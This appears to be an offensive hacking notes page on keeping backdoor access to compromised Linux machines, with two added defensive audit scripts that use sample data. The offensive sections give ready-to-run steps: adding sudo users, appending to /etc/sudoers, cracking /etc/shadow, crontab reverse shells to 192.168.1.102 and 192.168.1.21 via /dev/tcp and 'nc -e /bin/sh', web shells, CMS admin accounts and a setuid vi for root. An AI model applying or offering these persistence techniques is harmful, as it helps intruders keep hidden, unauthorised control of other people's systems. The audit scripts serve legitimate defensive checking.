
Persistence - Rootkit - Backdoor

So if you manage to compromise a system you need to make sure that you do not lose the shell. If you have used an exploit that messes with the machine the user might want to reboot, and if the user reboots you will lose your shell.

Or, maybe the way to compromise the machine is really complicated or noisy and you don't want to go through the hassle of doing it all again. So instead you just create a backdoor that you can enter fast and easy.

Create a new user

The most obvious, but not very subtle, way is to just create a new user (if you are root, or someone with that privilege).

adduser pelle
adduser pelle sudo

Now if the machine has ssh you will be able to ssh into the machine.

On some machines (older Linux distributions, I think) you have to do it by hand:

useradd pelle
passwd pelle
echo "pelle    ALL=(ALL) ALL" >> /etc/sudoers

Crack the password of existing user

Get the /etc/shadow file and crack the passwords. This is of course only persistent until the user decides to change his/her password. So not so good.

SSH key

Add key to existing ssh-account.
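The three footholds described above (an extra account, a line appended to sudoers, a key dropped into authorized_keys) are all plain-text changes that a defender can check for. The script below is an added example, not code from the original page: it builds small sample copies of the three files inline (constructed data) and runs three checks over them. PASSWD_FILE, SUDOERS_FILE and AUTHKEYS_FILE are hypothetical variables; on a real host point them at /etc/passwd, /etc/sudoers and a user's ~/.ssh/authorized_keys and compare the output against a known-good baseline.

```shell
#!/bin/sh
# Added example (not from the original page): audit the account, sudoers and
# SSH-key persistence points on sample files constructed inline.
# Assumptions: PASSWD_FILE, SUDOERS_FILE and AUTHKEYS_FILE are hypothetical
# variables standing in for /etc/passwd, /etc/sudoers and ~/.ssh/authorized_keys.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
PASSWD_FILE="$WORK/passwd"
SUDOERS_FILE="$WORK/sudoers"
AUTHKEYS_FILE="$WORK/authorized_keys"

# Constructed sample data: a second UID-0 account ("toor") and a new sudo user.
cat > "$PASSWD_FILE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
toor:x:0:0:backup admin:/root:/bin/bash
pelle:x:1001:1001::/home/pelle:/bin/bash
EOF

cat > "$SUDOERS_FILE" <<'EOF'
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
pelle    ALL=(ALL) ALL
EOF

# Constructed keys: the second one carries no comment identifying its owner.
cat > "$AUTHKEYS_FILE" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOne admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleKeyTwo
EOF

# Accounts other than "root" whose UID is 0: a second root login.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$PASSWD_FILE"
}

# Sudoers entries that name a single user (skip comments, Defaults, %groups).
user_sudoers_entries() {
    grep -Ev '^[[:space:]]*(#|Defaults|%|$)' "$SUDOERS_FILE" | awk '{ print $1 }'
}

# Line numbers of authorized keys with no trailing comment; an untagged key
# is one nobody can immediately account for.
untagged_ssh_keys() {
    awk 'NF < 3 { print NR }' "$AUTHKEYS_FILE"
}
```

Run it as-is to see the three findings on the sample data; on a live host the useful comparison is today's output against the output recorded when the machine was built.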

Cronjob NC

Create a cronjob that connects back to your machine every 10 minutes. Here is an example using a bash reverse shell. You also need to set up a netcat listener on your side.

Here is how you check whether the cron daemon is running

service crond status
pgrep cron

If it is not started you can start it like this

service crond start
/etc/init.d/cron start

Then open the crontab and add one of these lines (the first is the bash reverse shell, the second uses netcat):

crontab -e
*/10 * * * * 0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196
*/10 * * * * nc -e /bin/sh 192.168.1.21 5556

Listener

nc -lvp 5556

Sometimes you have to set the user. The system-wide crontab (/etc/crontab and the files under /etc/cron.d) takes an extra user field between the schedule and the command:

crontab -e
*/10 * * * * pelle /path/to/binary

More here: http://kaoticcreations.blogspot.cl/2012/07/backdooring-unix-system-via-cron.html

Metasploit persistence module

Create a binary with malicious content inside. Run that, get meterpreter shell, run metasploit persistence.

https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/

If you have a meterpreter shell you can easily just run persistence.

Backdoor in webserver

You can put a cmd or shell-backdoor in a webserver.

Put the backdoor on the webserver, either in a separate file or hidden inside another file.

Admin account to CMS

Add admin account to CMS.

Mysql-backdoor

Mysql backdoor

Hide backdoor in bootblock

Nmap

If the machine has nmap installed:

https://gist.github.com/dergachev/7916152

Setuid on text-editor

You can set the setuid bit on an editor. Then, if you can easily get in as www-data, you can escalate to root through the editor.

With vi it is extremely easy. You just run :shell, and it gives you a shell.

# Make root the owner of the file
chown root myBinary

# set the setuid bit (chmod u+s; this is not the sticky bit, which is +t)
chmod u+s myBinary
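A setuid-root copy of an editor is something a periodic check can catch, because the setuid bit is visible to find and the set of legitimate setuid binaries on a host is small and stable. The script below is an added example, not code from the original page: it builds a small constructed directory tree with a setuid "vi" and a setuid "backup" helper next to an ordinary "ls", lists every setuid file under the tree, and singles out the ones whose name is an editor or a shell. SCAN_ROOT is a hypothetical variable; on a real host set it to / and run as root so every directory is readable, then diff the output against the list recorded when the machine was built.

```shell
#!/bin/sh
# Added example (not from the original page): list setuid files under a tree
# and single out editors and shells, which hand out a shell as the file owner
# (the ":shell" trick described above). Assumption: SCAN_ROOT is a hypothetical
# variable; set it to / on a real host.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
SCAN_ROOT="$WORK/root"

# Constructed sample tree. The files are empty stand-ins owned by the caller;
# on a real system the interesting ones would be owned by root.
mkdir -p "$SCAN_ROOT/usr/bin" "$SCAN_ROOT/usr/local/bin"
: > "$SCAN_ROOT/usr/bin/vi"
: > "$SCAN_ROOT/usr/bin/ls"
: > "$SCAN_ROOT/usr/local/bin/backup"
chmod u+s "$SCAN_ROOT/usr/bin/vi" "$SCAN_ROOT/usr/local/bin/backup"

# Every regular file with the setuid bit set, one path per line, sorted so the
# output can be diffed against a baseline.
list_suid_files() {
    find "$SCAN_ROOT" -type f -perm -4000 | sort
}

# The subset whose basename is an editor or shell: any of these with setuid
# gives an interactive shell (or arbitrary file writes) as the owner.
list_suid_shell_capable() {
    list_suid_files | while read -r path; do
        case "$(basename "$path")" in
            vi|vim|view|nano|ed|sh|bash|dash) echo "$path" ;;
        esac
    done
}
```

The second list is the one to act on immediately; the first is what you keep as the baseline. A setuid helper like "backup" in the sample is not necessarily wrong, but it should be in the baseline before it is on the box.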

References

Read this https://gist.github.com/dergachev/7916152

This is a great introduction: http://www.dankalia.com/tutor/01005/0100501002.htm
